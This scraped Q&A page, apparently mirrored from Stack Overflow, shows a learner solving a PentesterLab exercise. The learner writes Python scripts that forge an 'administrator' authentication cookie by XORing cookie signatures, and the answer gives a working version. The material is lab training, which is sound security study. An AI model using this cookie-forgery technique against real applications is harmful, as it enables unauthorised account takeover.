XOR'ing bytes and string for signing cookie
Question
I'm trying to solve exercise from pentesterlab. In short those are steps I need to do:
- Login as "administ"
- Decode the cookie, extract the signature
- XOR the signature with "rator"
- Login with this value as username
- Decode the new cookie, extract the signature
- Concatenate the signature with "administrator" to get the cookie
- Send the cookie to the application
I am stuck at xoring. If I xor b"administ" and "\\00\\00\\00\\00\\00\\00\\00\\00" I get what expected but when XOR'ing b"strator" and signature I get: '·gæ¿pk=\\x91' which I believe isn't correct. Could someone help me with the right direction?
#cookie: YWRtaW5pc3QtLcUGktACaz2R
#decoded = administ--k=
#curl 'http://ptl-a696a9c3-4f721187.libcurl.so/login.php' --data-raw 'username=administ&password=Password1'
import requests
import base64
session = requests.Session()
#print(session.cookies.get_dict())
URL = 'http://ptl-a696a9c3-4f721187.libcurl.so/'
#USERNAME = 'administ'
PASSWORD = 'Password1'
def login(username):
payload = {
'action': 'login',
'username': username,
'password': PASSWORD
}
response = session.post('http://ptl-a696a9c3-4f721187.libcurl.so/login.php', data=payload)
cookie = session.cookies.get_dict()['auth'].rstrip("\'")
return cookie
#print(cookie)#['auth'].rstrip("\'"))
cookie = login("administ")
signature = base64.b64decode(cookie).split(b"--")[1]
def byte_xor(a,b):
xored = []
for i in range(max(len(a), len(b))):
xored_value = a[i%len(a)] ^ b[i%len(b)]
xored.append(chr(xored_value))
return ''.join(xored)
username2 = (byte_xor(b"rator\00\00\00", signature))
cookie2 = login(username2)
signature2 = base64.b64decode(cookie2).split(b"--")[1]
print(base64.b64encode("administrator--{signature2}="))
I've also tried two other functions without success:
def byte_xor(a,b):
xored = []
for i in range(max(len(a), len(b))):
xored_value = a[i%len(a)] ^ b[i%len(b)]
xored.append(chr(xored_value))
return ''.join(xored)
def bxor(b1, b2): # use xor for bytes
parts = []
for b1, b2 in zip(b1, b2):
parts.append(bytes([b1 ^ b2]))
return b''.join(parts)
I made it better and everything seems to work but cookie is still not good:
#YWRtaW5pc3QtLcUGktACaz2R
#decoded = administ--k=
#curl 'http://ptl-a696a9c3-4f721187.libcurl.so/login.php' --data-raw 'username=administ&password=Password1'
import requests
import base64
import sys
session = requests.Session()
#print(session.cookies.get_dict())
URL = 'http://ptl-a696a9c3-4f721187.libcurl.so/'
#USERNAME = 'administ'
PASSWORD = 'Password1'
def login(username):
payload = {
'action': 'login',
'username': username,
'password': PASSWORD
}
response = session.post('http://ptl-a696a9c3-4f721187.libcurl.so/login.php', data=payload)
cookie = session.cookies.get_dict()['auth'].rstrip("\'")
return cookie
#print(cookie)#['auth'].rstrip("\'"))
cookie = login("administ")
signature = base64.b64decode(cookie).split(b"--")[1]
def bxor(b1, b2): # use xor for bytes
result = []
for b1, b2 in zip(b1, b2):
result.append(b1 ^ b2)
return result
username2 = bxor(bytearray('rator\00\00\00', encoding='utf8'), signature)
characters = [chr(n) for n in username2]
#print(characters)
username3 =''.join(characters)
print(username3)
cookie2 = login(username3)
print(cookie2)
signature2 = base64.b64decode(cookie2 + "==").split(b"--")[1]
cookie_final = base64.b64encode(b"administrator--")+base64.b64encode(signature2)
print(cookie_final)
1 answers
solution1
0 2021-11-14 05:25:05
OH MY GOD I DID IT!
#WRtaW5pc3QtLcUGktACaz2R
#decoded = administ--k=
#curl 'http://ptl-a696a9c3-4f721187.libcurl.so/login.php' --data-raw 'username=administ&password=Password1'
import requests
import base64
import sys
session = requests.Session()
#print(session.cookies.get_dict())
URL = 'http://ptl-a696a9c3-4f721187.libcurl.so/'
#USERNAME = 'administ'
PASSWORD = 'Password1'
def login(username):
payload = {
'action': 'login',
'username': username,
'password': PASSWORD
}
response = session.post('http://ptl-a696a9c3-4f721187.libcurl.so/login.php', data=payload)
cookie = session.cookies.get_dict()['auth'].rstrip("\'")
return cookie
#print(cookie)#['auth'].rstrip("\'"))
cookie = login("administ")
signature = base64.b64decode(cookie).split(b"--")[1]
def encrypt2(var, key, byteorder=sys.byteorder):
key, var = key[:len(var)], var[:len(key)]
int_var = int.from_bytes(var, byteorder)
int_key = int.from_bytes(key, byteorder)
int_enc = int_var ^ int_key
return int_enc.to_bytes(len(var), byteorder)
username2 = encrypt2(b"rator\00\00\00", signature)
cookie2 = login(username2).replace("%2B", "+")
signature2 = base64.b64decode(cookie2 + "==").split(b"--")[1]
print(base64.b64encode(b"administrator--"+signature2))
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.
Related Question
XOR'ing each bit of a binary string in Python
Python - “xor”ing each byte in “bytes” in the most efficient way
XOR'ing bitstrings
Creating xor checksum of all bytes in hex string In Python
XOR strings of bytes
xor-ing a large file in python
Bytes object stored in “repr format” as b'foo' instead of encode()-ing to string — how to fix?
unsupported operand type(s) for ^: 'bytes' and 'bytes' with XOR
crcmod's xorOut parameter does not behave the same as manually xor'ing
CRC calculation: Polynomial division with bytewise message XOR-ing?
Related Tags